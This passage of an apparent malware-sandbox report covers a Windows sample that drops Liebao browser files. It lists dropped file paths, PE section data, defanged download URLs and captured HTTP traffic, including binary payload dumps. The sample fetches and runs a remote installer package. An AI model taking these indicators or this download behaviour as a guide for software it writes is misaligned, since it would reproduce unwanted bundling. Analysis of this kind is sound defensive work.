%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfc000f.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\kui_en-US.pak (25 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksesscan.dll (7879 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\sqlite3.exe (5007 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\ljdfelebfnfpjclmmkljlnagcdkpfpdl\1.0\Cached Theme.pak (6363 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\zlib1.dll (1112 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\KPreferences (503 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb8009.ksg (5 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\uninst.exe (10202 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseexf.dat (107 bytes)
%Program Files%\liebao\liebao.exe (11518 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksepnf.dat (107 bytes)
%System%\drivers\knbdrv.sys (601 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\dlcore.dll (20026 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\pkw.dat (669 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb8003.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\checkvideo.dat (61 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb8008.vsg (264 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\d3dcompiler_46.dll (28052 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\localurl.db (3668 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\kadfilter.dll (5863 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\LegoIcon\lego.dat (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\MouseGesture.dll (8245 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\feature2.dat (23 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\libGLESv2.dll (5682 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\install_info.json (255 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\safepay.dat (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\install2_log.log (72726 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj101204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepac001.ksg (1844 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\third_party\baidu_hd_query.dll (3341 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztmc0000.psg (66 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\falset.psg (132 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\czb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\PepperFlash\pepflashplayer.dll (110917 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb7001.ksg (1 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\kBUpdateHelper.dll (13747 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ffmpegsumo.dll (11323 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\kvipinter.dll (3811 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\猎豹安全浏览器\猎豹安全浏览器.lnk (632 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ksapi.dll (691 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvb9008.vsg (264 bytes)
%System%\drivers\KNBDrv64.sys (601 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\hxb.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseescan.dll (4564 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfc000b.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\Logos.db (3769 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Local State (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvc0011.vsg (263 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\ktoolupd.dll (2779 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\icbc.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj141203.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\liebao.exe (14580 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\bepb6002.ksg (4 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipbb004.ksg (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btfb7001.fsg (264 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb0001.ksg (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\Allvinfo.ini (833 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kseset.dat (229 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\srvpref.dat (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\oj051204.fsg (262 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\zh-CN.pak (193 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\resource.dat (735 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\Bookmarks (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\d3dcompiler_43.dll (15709 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\false.ksg (888 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvc0019.vsg (264 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\ksais.dat (8 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\anti_injection2.dat (710 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\scom.dll (1596 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\libEGL.dll (1722 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kfcdetect.dll (7469 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\SecondaryTile.png (5 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\plugins\np-mswmp.dll (1724 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztfb0005.fsg (288 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\uplive.dll (15007 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\sqlite.dll (1872 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\ztvbb00d.vsg (270 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\signs.ini (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\tenpay.png (2 bytes)
%Program Files%\liebao\test_access (30 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\chrome_100_percent.pak (6387 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\cmb.png (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaearcha.dat (1358 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\gdeploy.dat (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zepb9002.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\gdb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaextend.dat (106 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\upgrade.dll (9080 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecoref.dat (106 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipba004.ksg (7 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecorea.dat (173 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\kaxhlp.dll (4594 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\adb_easylist.dat (7386 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\knbdrv.sys (1326 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\webresource.dat (7712 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\liebao.dll (210497 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\TNProxy.dll (5849 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\liebao.ico (30 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\switchcore.db (7386 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\PresetExtensions\nffflelpnjalbndohecponhmlcihbgeo\1.0\Cached Theme.pak (1610 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\knbcenter.exe (4415 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\unionpay.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\DownloadProxy.dll (4458 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb0002.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\kwnp.dat (23 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\master_preferences (557 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\Tencentdl.exe (8880 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\sdb.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipc0003.ksg (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\cyui.exe (3249 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\img\safesearch_safe.png (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\ksbwdt.ini (2 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btvb7002.vsg (294 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\DesktopTips.exe (7305 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\locales\kui_zh-CN.pak (24 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\security\kxescan\kae\kaecorem.dat (97 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Data\wd.dat (6 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\btfc2009.psg (92 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\security\ksg\zipb7004.ksg (3 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\Module\qqdl\DownloadProxyPS.dll (1806 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\猎豹安全浏览器.lnk (652 bytes)
%Program Files%\liebao\2014522163323984_1\LBBrowser\cysvc.dll (6685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0liebao.exe (3750 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ÊÖ»úºäÕ¨»ú.exe (12288 bytes)
%Program Files%\liebao\4.5.34.6725\Data\expand_safepay.dat (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\uproperty.db (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\uproperty.db-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\upgrade\manager.log (455 bytes)
%Program Files%\liebao\4.5.34.6725\log\kmctrl.log (1537 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\upgrade\cleanup.log (1064 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\LOG (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\2.tmp (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\MANIFEST-000001 (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\MANIFEST-000002 (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\website\000002.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\boot_setup.pack.tmp (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\send_5ac.gz (432 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe (365108 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\boot_setup.pack.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe.pack.fd (9216408 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\Bootsetup\2.1.11.3341\66\ksbinstaller_66_82685.exe.pack.fd.cfg (3656 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\dlcore.dll (14022 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\Tencentdl.exe (6841 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\extract.dll (2105 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\DownloadProxyPS.dll (601 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\InstallInfo.xml (25 bytes)
%Program Files%\Common Files\Tencent\QQDownload\122\tnproxy.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp\setup.bat (350 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp\down_s_66_82685.exe (5547 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: ????????
Product Name:
Product Version: 1.0.0.0
Legal Copyright: ????? ?????????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ?????????????
Comments: ??????????(http://www.eyuyan.com)
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
CODE | 4096 | 40132 | 40448 | 4.51726 | 4b3aeb2fc3b7b21ea3fdd5ad16a9ddf5 |
DATA | 45056 | 15632 | 15872 | 5.26127 | 1fb0fcf0a8c302fd1e7df6150f434d7e |
BSS | 61440 | 1825 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 65536 | 1730 | 2048 | 2.91217 | 9e9581a6aeb1c6de49e8280941f8bb34 |
.tls | 69632 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 73728 | 24 | 512 | 0.142404 | 996c4942e3a4d2795a22f3ace698d094 |
.reloc | 77824 | 1792 | 2048 | 4.24404 | d645c969d7346a611453d5e9e94c66f4 |
.rsrc | 81920 | 2630444 | 2630656 | 5.53486 | 0aaa3ad251a10f1f12ad7ae8e034fabc |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://lbdata.tj.ijinshan.com/data/ | 114.112.93.201 |
hxxp://lbdl.union.ijinshan.com/?pid=66&spid=82685&date=1400765523 | 114.112.93.101 |
hxxp://lbdl.union.ijinshan.com/liebao/66_82685.pack | 114.112.93.101 |
hxxp://lbdl.union.ijinshan.com/liebao/66_0.pack | 114.112.93.101 |
hxxp://tf01.dlmix.glb0.lxdns.com/liebao/pack/ksbInstaller_6725_66_0.pack | |
hxxp://d.union.ijinshan.com/liebao/pack/ksbInstaller_6725_66_0.pack | 8.37.234.15 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /liebao/pack/ksbInstaller_6725_66_0.pack HTTP/1.1
Range: bytes=11728801-
Pragma: no-cache
Cache-Control: no-cache
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.8888.8888;)
Host: d.union.ijinshan.com
HTTP/1.0 206 Partial Content
Date: Thu, 22 May 2014 13:32:05 GMT
Server: Tengine/1.5.2
Content-Type: application/octet-stream
Last-Modified: Thu, 09 Jan 2014 09:24:45 GMT
Accept-Ranges: bytes
Content-Range: bytes 11728801-46915205/46915206
Content-Length: 35186405
X-Cache: HIT from cache.51cdn.com
Via: 1.0 jg9:38080 (Cdn Cache Server V2.0)
Connection: close
q..../d.N....Wj;8`...h.4Z...]w.=..=.Ibb..'u4.3F..HK.!.s...5...l....y....._=$$...q...#.auK".T...........@......PH.Obp..V;...D..W.O$a..?O>..`-.K..F ....pg..E..9$..(..!@.T.u.....v...|hS...ww....f....2.v1.4x.-.2..R.un......K@.(....F0.......I..&....g.X ..]..F...M.\..S..QR.K.!...F..r.<(..Q.y^.......wK..P.^...Q.L...n4.....mfT......p.]um.9.|..m..".......,..S.o...=..Z.......%...H.'.Ss.h.....}._&40.7...8.A.2sj.......pH._X....E .....x...D.......n.....T.y.}.....D.G....Y..QY.X..B..v.N)'/.2I.........]C.i8.......~..A...KKY.]x......~K..1".?...`}?.....mu.i...,..kz3.%...Hs16....f.L:...N.g@...wd...o............$MM<..C.4 .d.S.......r.`=D.`..u..$!.OwL..l....$.09F.ko7..|G......m..(}..6q.0:%.."...W.....-.%w...8......F..X....&uA...zg)n......Y.=..M%. .....M.V~.......s.b..........r..9l...$..F.t0.pnW...*..N..3..B..3P.P...w.JL...z.7..l.QV..I1?....h....Ob1.eS..[...`.....z .d&......P8u....h.N.En.S........34.Q..F..m...FsTq_.t~.-.j......dEk....g..sa/.%_..:}_...17t..>.....0.......T....X.TG:........x.k..h.w..x.J..2.8#.a.....e@3..NzE.A...0..F3#Y..c..CD..;=Z.....4. ..3] qg...xdo.X....U...G.yD..y..b...u.........X.#...u../.hL#.1)n...u;....\.fd.u..Jv.2.bP..>...n<..j...&cx.......&zJ...f.?k.dz......n`.%..#...y.k.....M....b.....O.E..e#..jd..-.0Z V..a 4...c.L..O..DC.C.W#H.~p.W....*.R..E.5...j#>Vt.....C.%v}...H.S...U.6piM)..DB.....f.....hg.f$.....e..U.|._x...Yn....`JB.Q.M~.@04Ot`ns...ue.TE\.R.. .].........:.QF|...S2.......5I.6....@.c[..Hk.....g..'...*...(C{A.R...G.w.9..\...`O...i.....9P.......#.S....3<2.M^.....a.... >.x=.....}.
<<
<<< skipped >>>
GET /liebao/pack/ksbInstaller_6725_66_0.pack HTTP/1.1
Range: bytes=35186403-
Pragma: no-cache
Cache-Control: no-cache
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.8888.8888;)
Host: d.union.ijinshan.com
HTTP/1.0 206 Partial Content
Date: Thu, 22 May 2014 13:32:05 GMT
Server: Tengine/1.5.2
Content-Type: application/octet-stream
Last-Modified: Thu, 09 Jan 2014 09:24:45 GMT
Accept-Ranges: bytes
Content-Range: bytes 35186403-46915205/46915206
Content-Length: 11728803
X-Cache: HIT from cache.51cdn.com
Via: 1.0 jg9:38080 (Cdn Cache Server V2.0)
Connection: close
._....M....Z...o\..OBD..CT.s.....n7...;e. .H..m$.._,.......s7..Z..F...Z?../..^42'x.9.3.:.A.T...N...2?u......4...woT...;...~.4..NC.....c..q.i-...3.F.sHGZ.c...q[a..c.....@..u..Z-..".L0C{.5.....,.12.<&v...e.^"....C..po.".LO...9.i.pf.F..4..r7w.9.)....J.8..i.d..;..uA.kup.'"p]..~.'u..$... /].0....@.>..y.ws..k.|..H......G...-E..O9.*.... .V6.%.4....o...&.0"H.{``..<A..}...,.7E.............Q......a...........6.~..R.`\q\m.X=..I...D]..........n....!V.q...Q...bZ...9../.o....L.xT.@BI.)8....,.{... .ea......e....3..:..f&..'..p(.o......\..$..M..........p...h.r......c\#..fj..).....g......)#.?...4(....#...qU.........e...`..O.....4Y..KJ....|................\;..Z..F./.d......Qa.{@v....H.w'.V....8`.-..v.....;)w....q.......EG..'...../.9V...O,....M...%...`66.t.`s..:.ZTr.w.!. .1`#....y..U..<g.Joo.....`)......}e%.h..-{:#.....h..Wo......A8.B.nA....:......M.n...|.U..}....6*O.G..r..E..E{...c.[5O...1Z@....do....;d.~_^..3..ZY.....kT....{..3.....kc...Qj7#..E..Y......=-.zv.b.<...Nr..?.3_.j.[.f..........$..h0.:..(o.....}D...Y'6.E.~.....[....!...T.....".xb..u.m.N.....{So....).T.*.i....?.x,.....9.N..<..2#..]~6.y........w.1...}I:mf?=..Q.......PLJvAB|..X..m...p...u..)...F......... @.....8*......w..EY.....>..W#...W.^...l.R...4..........Aj..'...7>.....f....c.....!..s...h$`.O...b.....l*..b.JK.....\......i...T.V...Y.._c}H...ZRt...;FR?.0N..Z.j..^)Wo...'....O..../..-..p.:}.....{...0.E..r.p.U......K....h.....<.8e#U~..D<...C..|.......k.....a.".U....2)...i/.=.5tf.=g...H`..]o..N.a.>U...w9'&..-.Nw.H5(.W....t[.9P..*Pu.;..e[e..=
<<
<<< skipped >>>
GET /liebao/pack/ksbInstaller_6725_66_0.pack HTTP/1.1
Range: bytes=23457602-
Pragma: no-cache
Cache-Control: no-cache
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.8888.8888;)
Host: d.union.ijinshan.com
HTTP/1.0 206 Partial Content
Date: Thu, 22 May 2014 13:32:05 GMT
Server: Tengine/1.5.2
Content-Type: application/octet-stream
Last-Modified: Thu, 09 Jan 2014 09:24:45 GMT
Accept-Ranges: bytes
Content-Range: bytes 23457602-46915205/46915206
Content-Length: 23457604
X-Cache: HIT from cache.51cdn.com
Via: 1.0 jg9:38080 (Cdn Cache Server V2.0)
Connection: close
....x...0.`AH..e.,..'...0..Li...d=....;.......l~.$......b...k.EP. .Q,d0.............X.sU.m..4.... GH0..........LO{KF.gP<.......~................{.......rU..\5...@.#a...S0fZ[..ZV'1`=...n.H.P.]P.H.C...l(tVJ.M^.).. .pJC..^....1.4.8UE....l...0.O....W)v...z...`..t.;..z .........".p4OS.E..?..}C..*:T=.\....F*N.h.]....`h.K.?6.A..{..gD.K......Lg/(.d`...pB!..'W......Z."..>.....o..X.H8.....5& y....-.c...k..$.,.U....}yP.d.'.=4q....... !...%.....{4G.2"u.!..3F..n%}._4..k.Zcj....2.._;-.d..7...Q.X..,.&?[..0.....G&...M..,.q&.D.wS........`........D.y..:.PE.v=....$........ hi.?...}.3.....TsFE.5..S..'..j.)............}.jL...*.t.............;|~.K..y.."m.1...;.H....x.4..).. w/...D.~....4M.........D...SY#q.....U.Z...iw.G.i..G.%........k[L...m._.$.Hsd|..........R&...`.^.9..|Xq.\....qn&_Y^..aL.<3..YS./....,P._.=........x..MH......?H<.w*..^....l"}#.B:...c>....t.G.'...3j..D....A...O.x.....=.m..i..z.. b!.....%.D .-Qb...YOd...K....`w9\x8{.........C...Q1....i...T....U./L......A.V.1.1.....:...%E.{.y.7.X..{...lJX.(m.#.ke.......=..K.....b.U...h....6?X..>..t.m..\|^.=......nH......}.q...8...r..D....#pR..l#-..2k......V..&.&.o.....#.T.9.D..n#....xR..9._.8........].03.fi0........x..]c_.^.{...$....Rd.Ps.~..b~C).0.L.......;i2..t..}.fS..>...8..... 7.....9...m..;g-.B?f.^ Gn..u.1}k.P..........N.\...YmMd..y.x..b........q.].. (..r....h.......9.i......."h]z....bc.].A...}......O...._...2b..V..-Up.......j} ..5....>........MVu..]......7...ZO.Dg.r.X.9.T..Nx...\:....%u....w.......Gsd..O........#..a...S..S...#..6..s......F...aPp_.3?..".s.
<<
<<< skipped >>>
POST /data/ HTTP/1.1
Connection: close
Cache-Control: no-cache
User-Agent: liebao
Host: lbdata.tj.ijinshan.com
Content-Length: 177
............A..0..... '.....(..Z..5....p.=..6..k.. ~Q.......x...6.<..K....@KH.!.&.Pt.\..&|.r..[F......b..a..QRr....#.9:...y!4.tU ...^.L..3.u...[m.B............................
HTTP/1.1 200 OK
Server: ngx_openresty/1.4.3.4
Date: Thu, 22 May 2014 13:32:00 GMT
Content-Type: text/plain
Content-Length: 35
Connection: close
[common]..result=1..time=1400765520..
GET /liebao/pack/ksbInstaller_6725_66_0.pack HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.8888.8888;)
Host: d.union.ijinshan.com
Connection: Close
HTTP/1.0 200 OK
Date: Thu, 22 May 2014 13:32:05 GMT
Server: Tengine/1.5.2
Content-Type: application/octet-stream
Last-Modified: Thu, 09 Jan 2014 09:24:45 GMT
Accept-Ranges: bytes
Content-Length: 46915206
X-Cache: HIT from cache.51cdn.com
Via: 1.0 jg9:38080 (Cdn Cache Server V2.0)
Connection: close
x...}|T..8~.%.M.d.L`..QW..1.....@6D!....DL...u....$V...U......Z_.-Z.<.mQ....`.^......h'.T. ....93w7.......~.;/g...s...3....... .....B... ....y:A....Y.....h..........-Y..................?oi...... .....C...8jT.M.q....7........{.#........};.6 ......>..]k.^.q.......}.../...p....iL.\...w.........F..y.........].......G.)..uiB.......^......._..,...tA.@ ..G..zAH.t,?.......~.#.^(ia........,....Ve..`..f!.m.p..}............g.e...1GE.Q.....F.)..'~..N.....o..L. ......VM\......p..=.{...g...zK&r0aJ.~Vf.."......L.,^&....7.....[.l.. ....F...=Y..........'.l..U..e..p.y?n...@....9..{T.....H...`.........V....C.&/i....2../H..........&.../...l....f.]..!|s.7>...y....9......B..I.......H?O...........On.7.l._..:3.<=*...A...yt./......b.(/....Ov....j.jH.m.......G.@>.......F....yC..B....h..tD..B....=...e..<._...R]yv].i.GK..jpH)....]....M..Jv.rl...cV2o(..5..4 ..8.PWI(R";EG.....bz.J.C.......j<GUW.`.6/......e.....H..=^.r=..e.:Rb.[....sc.]..7....Sg~[..X..6.=].......,7*w.......$..t].A...w...=.y..s}J.:.!..h{.a?.~j.U.I.U.....HK....j.*.i2|MvA.......t.....NGw....n...y]........Q......G..... ..%....o..;I.aoR...%z}..3..{.....E............g...*{H.Vcr}=..|.Py$Q.U..F..Se.Py.;....U5T.#.#j..m9t.l....xmWu`...../Ce...!.........Z:...s...E.L.3r.....rS.9u..U..H.g..jN.....g<...'..L.oB......WUnL.B.xG.iC. .l3...U...3.g.m..`.87..w.e'..-..?.D.:.t..b8uU'....^.;...-6.$..G..k......]..,......N.{...>C.&..#a2.e.....Xn<.3...c..........ez.A..t...oW...._.1T...udAM..lj.u...O....W.j..>... `..>6...=...i.;..'...'G.....<........*..}...dd..2..
<<
<<< skipped >>>
GET /?pid=66&spid=82685&date=1400765523 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Host: lbdl.union.ijinshan.com
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: kws
Date: Thu, 22 May 2014 13:32:02 GMT
Content-Type: text/html
Content-Length: 176
Location: hXXp://lbdl.union.ijinshan.com/liebao/66_82685.pack
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>kws</center>..</body>..</html>......
GET /liebao/66_82685.pack HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Host: lbdl.union.ijinshan.com
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: kws
Date: Thu, 22 May 2014 13:32:02 GMT
Content-Type: text/html
Content-Length: 176
Location: hXXp://lbdl.union.ijinshan.com/liebao/66_0.pack
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>kws</center>..</body>..</html>......
GET /liebao/66_0.pack HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; )
Host: lbdl.union.ijinshan.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: kws
Date: Thu, 22 May 2014 13:32:02 GMT
Content-Type: text/plain
Content-Length: 131
Last-Modified: Thu, 09 Jan 2014 09:33:51 GMT
Connection: keep-alive
Accept-Ranges: bytes
